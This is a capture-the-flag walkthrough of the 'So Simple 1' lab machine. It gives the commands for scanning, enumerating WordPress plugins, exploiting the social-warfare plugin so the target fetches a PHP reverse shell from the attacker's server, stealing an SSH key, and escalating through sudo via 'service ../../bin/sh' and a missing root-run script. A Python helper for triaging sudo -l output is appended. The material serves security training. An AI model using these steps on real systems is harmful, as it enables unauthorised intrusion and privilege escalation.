So Simple 1 Walkthrough

We start by scanning the host with “nmap -A -T4 -p- 192.168.1.11 -vv”:

Port 80 is open, so we brute-force the web root with “dirb http://192.168.1.18 /usr/share/dirb/wordlists/big.txt”:

The box is running WordPress, so we enumerate its installed plugins with wpscan (-e ap enumerates all plugins):

wpscan --url http://192.168.1.18/wordpress -e ap

We get two plugins, simple-cart-solution and social-warfare. Searching online for exploits, I found two write-ups for the social-warfare vulnerability, linked HERE and HERE:

Now we start a simple HTTP server on our machine (Python 2 shown; on Python 3 the equivalent is python3 -m http.server 8080) so the target can fetch the shell from us:

python -m SimpleHTTPServer 8080

With the server running, I copied the exploit, appended my IP address and the shell file I wanted to run (rshell.php) to the end of the command, and then browsed to http://192.168.1.18/wordpress/wp-admin/rshell.php

Start a listener on the port rshell.php connects back to, and you will get a shell back:

The first file I opened is personal.txt; its contents are base64 encoded, and when we decode it:

There is a .ssh folder containing an id_rsa private key:

Copy it, save it locally, restrict its permissions (ssh refuses a world-readable key), and use it to ssh in:

chmod 600 keys.txt

ssh max@192.168.1.11 -i keys.txt

Max flag file

Now max runs “sudo -l”; he is allowed to run service as steven. The service wrapper executes whatever is under /etc/init.d/, so a relative service name escapes that directory and lands on /bin/sh:

sudo -u steven service ../../bin/sh

Steven flag file

Steven also runs “sudo -l”, which shows he can run /opt/tools/server-health.sh as root.

But the path /opt/tools/server-health.sh doesn’t exist, so just create it and inside server-health.sh put:

Run it with “sudo -u root /opt/tools/server-health.sh”

And you are root.

Root flag file
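As an added example (not from the original walkthrough), here is a small Python triage script for “sudo -l” output that covers both escalation steps above: it parses the entries, shows where “service ../../bin/sh” actually resolves, and flags a sudo target that does not exist yet but sits in a writable directory, which is exactly steven's situation. The sudo -l text is constructed to match what the post says each user may run; the real output of the box is not reproduced in the post, and the hostname so-simple and the full path /usr/sbin/service are assumptions.

```python
import os
import re
import tempfile

# Constructed sample `sudo -l` output for the two users. The post does not
# reproduce the real output; these lines only reflect what it says each user
# may run (hostname "so-simple" and the full path of service are assumptions).
SUDO_L_MAX = """\
Matching Defaults entries for max on so-simple:
    env_reset, mail_badpass

User max may run the following commands on so-simple:
    (steven) NOPASSWD: /usr/sbin/service
"""

SUDO_L_STEVEN = """\
User steven may run the following commands on so-simple:
    (root) NOPASSWD: /opt/tools/server-health.sh
"""

# One sudoers entry line: "(runas) [TAG: ...] command [args]"
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$"
)

# Binaries whose sudo entry is a shell in disguise (GTFOBins-style).
# /usr/sbin/service runs ${SERVICEDIR}/${SERVICE} with SERVICEDIR=/etc/init.d,
# so the "service name" is really a path relative to /etc/init.d.
KNOWN_ESCAPES = {
    "service": "runs /etc/init.d/<name>; name '../../bin/sh' is /bin/sh",
}


def parse_sudo_l(text):
    """Return the command entries from `sudo -l` output as dicts."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append({
                "runas": m.group("runas").strip(),
                "nopasswd": "NOPASSWD" in m.group("tags"),
                "cmd": m.group("cmd").strip(),
            })
    return entries


def service_target(name, init_dir="/etc/init.d"):
    """Path that `service <name>` ends up executing."""
    return os.path.normpath(os.path.join(init_dir, name))


def triage_entry(entry):
    """Classify one sudo entry. Returns a list of (kind, detail) tuples."""
    cmd = entry["cmd"].split()[0]
    findings = []
    base = os.path.basename(cmd)
    if base in KNOWN_ESCAPES:
        findings.append(("known_escape", f"{base}: {KNOWN_ESCAPES[base]}"))
    if cmd.startswith("/"):
        parent = os.path.dirname(cmd)
        # os.access reflects the current user; as root everything is writable.
        if not os.path.exists(cmd):
            if os.path.isdir(parent) and os.access(parent, os.W_OK):
                findings.append(("missing_writable_parent",
                                 f"{cmd} does not exist and {parent} is writable: create it"))
            elif not os.path.isdir(parent):
                findings.append(("missing_no_parent",
                                 f"{cmd} and {parent} do not exist: check the nearest existing dir"))
            else:
                findings.append(("missing_protected",
                                 f"{cmd} does not exist and {parent} is not writable"))
        elif os.access(cmd, os.W_OK):
            findings.append(("writable", f"{cmd} is writable: replace its contents"))
    return findings


def triage(text):
    """Parse and triage a whole `sudo -l` dump; returns {cmd: [kinds]}."""
    return {e["cmd"]: [k for k, _ in triage_entry(e)] for e in parse_sudo_l(text)}


def demo_missing_script():
    """Reproduce steven's case in a temp dir: the target script is absent but
    its directory is writable, so the 'create it' finding fires."""
    tools = tempfile.mkdtemp(prefix="tools-")
    entry = {"runas": "root", "nopasswd": True,
             "cmd": os.path.join(tools, "server-health.sh")}
    return [k for k, _ in triage_entry(entry)]


if __name__ == "__main__":
    for text in (SUDO_L_MAX, SUDO_L_STEVEN):
        for e in parse_sudo_l(text):
            print(f"({e['runas']}) {e['cmd']}")
            for kind, detail in triage_entry(e):
                print(f"  [{kind}] {detail}")
    print("service ../../bin/sh ->", service_target("../../bin/sh"))
    print("temp-dir demo:", demo_missing_script())
```

Run it on the box with the real output piped in (sudo -l | python3 triage.py, adapting the main block to read stdin) to get the same two findings the walkthrough relies on: the service entry is a known escape, and the missing server-health.sh can simply be created. The filesystem checks are only meaningful when run as the user who holds the sudo rule, since os.access answers for the current user.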
